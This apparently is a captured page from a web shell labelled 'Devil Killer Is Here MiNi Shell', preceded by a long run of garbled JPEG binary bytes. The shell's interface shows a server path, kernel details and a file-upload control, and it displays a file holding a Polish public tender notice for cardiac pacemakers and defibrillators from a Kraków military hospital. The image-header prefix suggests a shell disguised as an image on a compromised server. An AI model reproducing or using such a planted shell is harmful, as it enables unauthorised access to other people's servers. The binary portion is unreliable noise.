JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231221/0056771201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy stymulatorów i kardiowerterów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">5 Wojskowy Szpital Kliniczny z POlikliniką SP ZOZ w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351506868</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wrocławska 1-3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-901</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam@5wszk.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://5wszk.com.pl/zamowienia-publiczne</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy stymulatorów i kardiowerterów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a068bff4-9ff4-11ee-948d-82b0c04ef850</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00567712</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00049205/71/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.61 Dostawy stymulatorów i kardiowerterów</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a068bff4-9ff4-11ee-948d-82b0c04ef850 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">2.	Strona internetowa prowadzonego postępowania : https://ezamowienia.gov.pl/, adres strony internetowej prowadzonego postępowania : https://ezamowienia.gov.pl/mp-client/tenders/ocds-148610-a068bff4-9ff4-11ee-948d-82b0c04ef850<br/>3.	Strona internetowa na której udostępniane będą zmiany i wyjaśnienia treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia : https://ezamowienia.gov.pl/ oraz https://5wszk.com.pl/zamowienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Treść oferty musi być zgodna z<br/>wymaganiami Zamawiającego określonymi w dokumentach zamówienia, w szczególności zgodnie z niniejszą SWZ.<br/>1. Oferta wraz z załącznikami musi być złożona przy pomocy Formularza ofertowego i cenowego (Załącznik nr 1 i nr 2 do SWZ)<br/>udostępnionego przez Zamawiającego na Platformie e-Zamówienia. Sposób zmiany i wycofania oferty został opisany w Instrukcji<br/>użytkownika dostępnej na stronie internetowej e-zamówienia https://ezamowienia.gov.pl/pl/instrukcje/ w zakładce „składanie ofert”. 2.<br/>Aby złożyć ofertę Wykonawca musi posiadać aktywne konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Korzystanie z Platformy e-Zamówienia jest bezpłatne. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i<br/>warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. Przeglądanie i pobieranie publicznej treści<br/>dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. W przypadku problemów<br/>technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia<br/>technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie<br/>internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. 3. Wykonawca przystępując do niniejszego postępowania o<br/>udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy e-Zamówienia, określone w Regulamin Platformy e-<br/>Zamówienia oraz zobowiązuje się korzystając z Platformy e-Zamówienia przestrzegać postanowień tego Regulaminu. 4.<br/>Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB. 5. Zamawiający zamieścił link do<br/>postępowania oraz ID postępowania w Rozdziale 2 SWZ. Postępowanie można wyszukać również ze strony głównej Platformy e-<br/>Zamówienia (przycisk „Przeglądaj postępowania/konkursy”) 6. Wykonawca składa ofertę za pośrednictwem zakładki Oferty/wnioski”,<br/>widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system<br/>prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola<br/>drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików. 7. System sprawdza, czy złożone pliki są podpisane i<br/>automatycznie je szyfruje, jednocześnie informując o tym wykonawcę. Potwierdzenie czasu przekazania i odbioru oferty znajduje się<br/>w Elektronicznym Potwierdzeniu Przesłania (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO). EPP i EPO dostępne są dla<br/>zalogowanego Wykonawcy w zakładce „Oferty/Wnioski”. UWAGA: Zamawiający nie udostępnia interaktywnego formularza<br/>ofertowego na platformie e- Zamówienia i należy zignorować komunikat pojawiający się przy składaniu oferty, iż „Postępowanie nie<br/>posiada opublikowanego formularza do tego etapu postępowania. 8.<br/>Wykonawca może przed upływem terminu składania ofert wycofać/zmienić ofertę. 9. Wykonawca wycofuje ofertę w zakładce<br/>„Oferty/wnioski” używając przycisku „Wycofaj ofertę”. 10. Sposób zmiany i wycofania oferty został opisany w Instrukcji użytkownika<br/>dostępnej na stronie internetowej e-zamówienia https://ezamowienia.gov.pl/pl/instrukcje/ w zakładce „składanie ofert”. 11.<br/>Zamawiający zaleca, aby oferta została utworzona w formacie pdf oraz podpisana wewnętrznym kwalifikowanym podpisem<br/>elektronicznym. W przypadku zastosowania podpisu zewnętrznego należy pamiętać o obowiązku dołączenia do pliku stanowiącego<br/>ofertę także pliku podpisującego, który generuje się automatycznie podczas złożenia podpisu</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, że: 1. Administratorem danych osobowych udostępnionych w<br/>ramach postępowania jest Zamawiający. 2. Kontakt do inspektora ochrony danych osobowych: adres e-mail:<br/>rodo@5wszk.com.pl,pisemnienaadresZamawiającego: 5Wojskowy Szpital Kliniczny z Polikliniką SP ZOZ w Krakowie, ul.<br/>Wrocławska 1-3, 30-<br/>901Kraków 3.Dane osobowe przetwarzane będą w związku z koniecznością wypełnienia obowiązku prawnego ciążącego na<br/>zamawiającym, w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego tj. zgodnie z art. 6 ust.1lit.c)<br/>rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w<br/>sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(„RODO”) w zw. z ustawą z dnia 29 stycznia<br/>2004r. Prawo zamówień publicznych (Dz.U.2017.1579 t.j. z dnia 2017.08.24) („PZP”); 4. W razie realizacji zamówienia publicznego<br/>dane osobowe przetwarzane będą w celu wykonania umowy tj. zgodnie art. 6 ust. 1 lit b) RODO. 5. odbiorcami danych osobowych<br/>będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania (komisja przetargowa) oraz odpowiedniorgany kontrole w zakresie ich kompetencji; 6. Dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca<br/>1983r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz. U. z 2018 r. poz. 217 z późn.zm.)i przepisów wykonawczych do tej<br/>ustawy. 7. obowiązek podania danych osobowych jest wymogiem ustawowym<br/>określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy PZP; 8. w odniesieniu do danych osobowych decyzje nie będą podejmowane w<br/>sposób zautomatyzowany. 9. Prawa osób których dane są przetwarzane: • prawo dostępu do danych osobowych; • prawo do<br/>sprostowania danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania)• prawo żądania od administratora ograniczenia przetwarzania danych osobowych(prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej<br/>lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego); 10. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy; 11. nie przysługuje Pani/Panu: •prawo do usunięcia<br/>danych osobowych; •prawo do przenoszenia danych osobowych; prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania danych osobowych jest konieczność wypełnienia obowiązku prawnego ciążącego na<br/>zamawiającym lub wykonanie umowy</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w<br/>przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy PZP; w odniesieniu<br/>do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany. Prawa osób których dane są przetwarzane:<br/>•prawo dostępu do danych osobowych;• prawo do sprostowania danych osobowych(Wyjaśnienie: skorzystanie z prawa do<br/>sprostowania nie<br/>może skutkować zmianą wyniku postępowania)•prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>(prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego); Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy; Nieprzysługuje<br/>Pani/Panu: •prawo do usunięcia danych osobowych; • prawo do przenoszenia danych osobowych; prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest konieczność wypełnienia<br/>obowiązku prawnego ciążącego na zamawiającym lub wykonanie umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">99/ZP/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;STYMULATOR JEDNOJAMOWY SSIR, Żywotność stymulatora min. 7 lat (nastawy nominalne)Waga max. 30 [g]<br/>ICD kompatybilność<br/>Funkcja rate response z programowaniem sensora<br/>Funkcja rate response – automatyczne ustawienie sensora<br/>Rytm nocny<br/>Stabilizacja rytmu komorowego w czasie migotania przedsionków<br/>Rejestrowanie trendów oporności elektrod przez cały okres życia<br/>Automatyczny pomiar progu stymulacji W zestawie: śrubokręt do gniazda stymulatorowego, mandryn do implantacji elektrod oraz pokrętło do implnatacji elektrod screw-in&#34;	szt.	10	0,00	0,00 0,00	<br/>&#34;STYMULATOR DWUJAMOWY DDDR, Żywotność stymulatora min. 7 lat (nastawy nominalne)<br/>Waga max. 30 [g]<br/>ICD kompatybilność<br/>Program nocny<br/>Funkcja rate response z programowaniem sensora<br/>Histereza AV delay (poszukiwanie własnego rytmu)<br/>Algorytm promujący przewodzenie AV<br/>Rodzaje stymulacji<br/>Zabezpieczenie, przed nagłym spadkiem częstości rytmu serca<br/>Automatyczna zmiana trybu stymulacji w obecności szybkich rytmów przedsionkowych<br/>Stabilizacja rytmu komorowego w czasie migotania przedsionków<br/>Rejestrowanie trendów oporności elektrod przez cały okres życia<br/>Automatyczny pomiar progu stymulacji<br/>W zestawie: śrubokręt do gniazda stymulatorowego, mandryn do implantacji elektrod oraz pokrętło do implnatacji elektrod screw-in<br/>&#34;	szt.	40	0,00	0,00 0,00	<br/>&#34;ELEKTRODA STYMULUJĄCA BIPOLARNA <br/>Elektroda sterydowa, aktywna, bipolarna <br/>Do wyboru różne długości i rozmiary elektrod<br/>&#34;	szt.	100	0,00	0,00 0,00	<br/>&#34;PODSKÓRNE URZĄDZENIE DO MONITOROWANIA I WYKRYWANIA ZABURZEŃ RYTMU SERCA<br/>Nazwa<br/>Producent <br/>Numer katalogowy <br/>Podskórne urządzenie do monitorowania i wykrywania zaburzeń rytmu serca <br/>Możliwość transmisji danych z urządzenia do centralnego systemu monitorowania <br/>Objętość urządzenia max. 1,4cm3<br/>Urządzenie dopuszczone do użycia z MRI&#34;	szt.	20	0,00	0,00 0,00	<br/>&#34;	KARDIOWERTER - DEFIBRYLATOR JEDNOJAMOWY ICD VR Kardiowertery z gniazdem typu DF-1 oraz DF-4<br/> Waga max. 90 [g] <br/> Energia defibrylacji min. 35 [J] <br/> Rozpoznawanie arytmii min.2 typy - VF i VT <br/>Algorytm wykorzystujący analizę morfologii zespołu QRS do różnicowania z częstoskurczu komorowego od nadkomorowego <br/>Automatyczny pomiar parametrów baterii i elektrody <br/>Terapia antyarytmiczna min. 3 typy <br/>Możliwość programowalnego wyłączenia obudowy urządzenia z obwodu wysokonapięciowego <br/>Żywotność przy 50% stymulacji w trybie VVI, 4 ładowania w ciągu roku przy nast.: 60 [ppm]; 500 Ohmów; 2,5 [V]; 0,4 [ms] - min. 5 lat <br/>Możliwość zaprogramowania strefy FVT w strefie VF i VT <br/>Automatyczny wybór ostatniej skutecznej terapii antyarytmicznej <br/>Dostępne min. dwa pomiary trendów<br/> Możliwość dostarczenia terapii ATP w czasie ładowania kondensatorów w strefie VF <br/> Bezprzewodowa komunikacja wszczepionego urządzenia z programatorem <br/> Możliwość programowego wyłączenia bieguna wysokonapięciowego SVC <br/> Automatyczna sygnalizacja uszkodzenia elektrody <br/> Automatyczna sygnalizacja ERI <br/>Urządzenie do użycia z MRI &#34;	szt.	5	0,00	0,00 0,00	<br/>&#34;KARDIOWERTER - DEFIBRYLATOR DWUJAMOWY ICD DR Kardiowertery z gniazdem typu DF-1 oraz DF-4<br/>Waga max. 90 [g]<br/>Energia defibrylacji min. 35 [J]<br/>Rozpoznawanie arytmii min.2 typy - VF i VT<br/>Algorytmy różnicujące częstoskurcz komorowy od nadkomorowego - min. 1<br/>Algorytm wykorzystujący analizę zależności rytmu komorowego i przedsionkowego do różnicowania z częstoskurczu komorowego od nadkomorowego<br/>Automatyczny opis stanu baterii i oporności elektrody<br/>Terapia antyarytmiczna min. 3 typy<br/>Możliwość programowalnego wyłączenia obudowy urządzenia z obwodu wysokonapięciowego <br/>Żywotność przy 50% pacing quarterly charges- min. 5 lat /nast.: 60 [ppm]; 500 ohms; 2,5 [V]; 0,4 [ms]./<br/>Możliwość zaprogramowania strefy FVT w strefie VF i VT<br/>Możliwość różnicowania częstoskurczu komorowego od: AT/AF, częstoskurczu zatokowego, częstoskurczu z przewodzeniem 1:1<br/>Automatyczny wybór ostatniej skutecznej terapii antyarytmicznej<br/>Dostępne min. dwa pomiary trendów<br/>Możliwość dostarczenia terapii ATP w czasie ładowania kondensatorów w strefie VF<br/>Przedsionkowy tryb pracy urządzenia z zabezpieczającą stymulacją komorową w przypadku wystąpienia zaburzeń przewodzenia A-V<br/>Bezprzewodowa komunikacja wszczepionego urządzenia z programatorem<br/>Możliwość monitorowania częstoskurczy przedsionkowych<br/>Możliwość programowego wyłączenia bieguna wysokonapięciowego SVC<br/>Automatyczna sygnalizacja ERI (sygnał dźwiękowy generowany przez wszczepione urządzenie informujący pacjenta)<br/>Automatyczna sygnalizacja uszkodzenia elektrody <br/>Długoczasowy zapis interwałów V-V (np. Flash back memory)<br/>Zapis trendów fali P i R powyżej 18 miesięcy<br/>Urządzenie do użycia z MRI 1,5 oraz 3T&#34;	szt.	10	0,00	0,00 0,00	<br/>&#34;ELEKTRODA DEFIBRYLUJĄCA Elektrody do defibrylacji aktywne , sterydowe, jedno i dwukoilowe typu DF-4 i DF-1 <br/>Dostępne min. dwie długości elektrod typu DF-1<br/>Dostępne min. dwie długości elektrod typu DF-4 Rozmiar i długości do wyboru przy zamówieniu&#34;	szt.	20	0,00	0,00 0,00	<br/>Intruducery do elektrod stymulujących i defibrylujących, różne rozmiary 7-10 F Rozmiar do wyboru przy zamówieniu	szt.	110	0,00	0,00 0,00	<br/>ZAŚLEPKA DO GNIAZDA STYMULATOROWEGO Sterylna zaślepka do gniazda stymulatorowego IS-1/IS-4	szt.	5	0,00	0,00 0,00	<br/>ZAŚLEPKA DO GNIAZDA KARDIOWERTEROWEGO, Sterylna zaślepka kompatybilna z gniazdem kardiowerterowym DF-1/SVC	szt.	5	0,00	0,00 0,00	<br/>ZAŚLEPKA NA KONEKTOR ELEKTRODY TYPU IS-1	szt.	5	0,00	0,00 0,00	<br/>&#34;ŚRUBOKRĘT DO GNIAZDA STYMULATOROWEGO Sterylny śrubokręt do gniazda stymulatorowego<br/>Śrubokręt z zabezpieczeniem dynamometrycznym do gniazd stymulatorowych &#34;	szt.	5	0,00	0,00 0,00	<br/>&#34;MANDRYN DO IMPLANTACJI ELEKTROD Mandryn o długości w zakresie od 45 [cm] do 75 [cm] <br/>Dostępny mandryn J-kształtny <br/>Dostępny mandryn prosty&#34;	szt.	5	0,00	0,00 0,00	<br/>&#34;POKRĘTŁO DO IMPLANTACJI ELEKTRODY SCREW-IN Pokrętło do wysuwania spirali screw-in przy implantacji elektrod stymulacyjnych<br/>Możliwość zastosowania do elektrod DF4&#34;	szt.	5	0,00	0,00 0,00	<br/>Kapturek na elektrodę	szt.	5	0,00	0,00 0,00	<br/>Kabel do analizatora	szt.	5	0,00	0,00 0,00	<br/>Papier do programatora x 6 ryz	op.	10	0,00	0,00 0,00	<br/>Magnes x 4 szt	op.	1	0,00	0,00 0,00	<br/>Zamawiający wymaga dostarczenia w formie bezpłatnej dzierżawy 2 szt. programatorów do implantacji i kontroli pacjentów <br/> 0,00 0,00	<br/>konieczne utworzenie depozytu ,asortyment i rozmiary do ustalenia z operatorem </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33140000-3 - Materiały medyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Ilości poszczególnych rodzajów towaru w opisie przedmiotu zamówienia mają charakter szacunkowy. Kupujący zastrzega<br/>sobie możliwość zmniejszenia przyjętych w umowie ilości i częstotliwości dostaw stosownie do swoich potrzeb. Niewykonanie przez Zamawiającego umowy w zakresie do 50% łącznej ceny brutto nie wymaga podania przyczyn i nie<br/>stanowi podstawy jego odpowiedzialności z tytułu niewykonania lub nienależytego wykonania umowy.<br/>W przypadku niewyczerpania w okresie obowiązywania umowy wartości brutto umowy Kupujący uprawniony będzie, na<br/>podstawie jednostronnego oświadczenia, złożonego Sprzedającemu przed upływem terminu umowy do przedłużenia<br/>terminu obowiązywania umowy o czas określony wskazany w oświadczeniu, nie dłużej niż o 90 dni <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 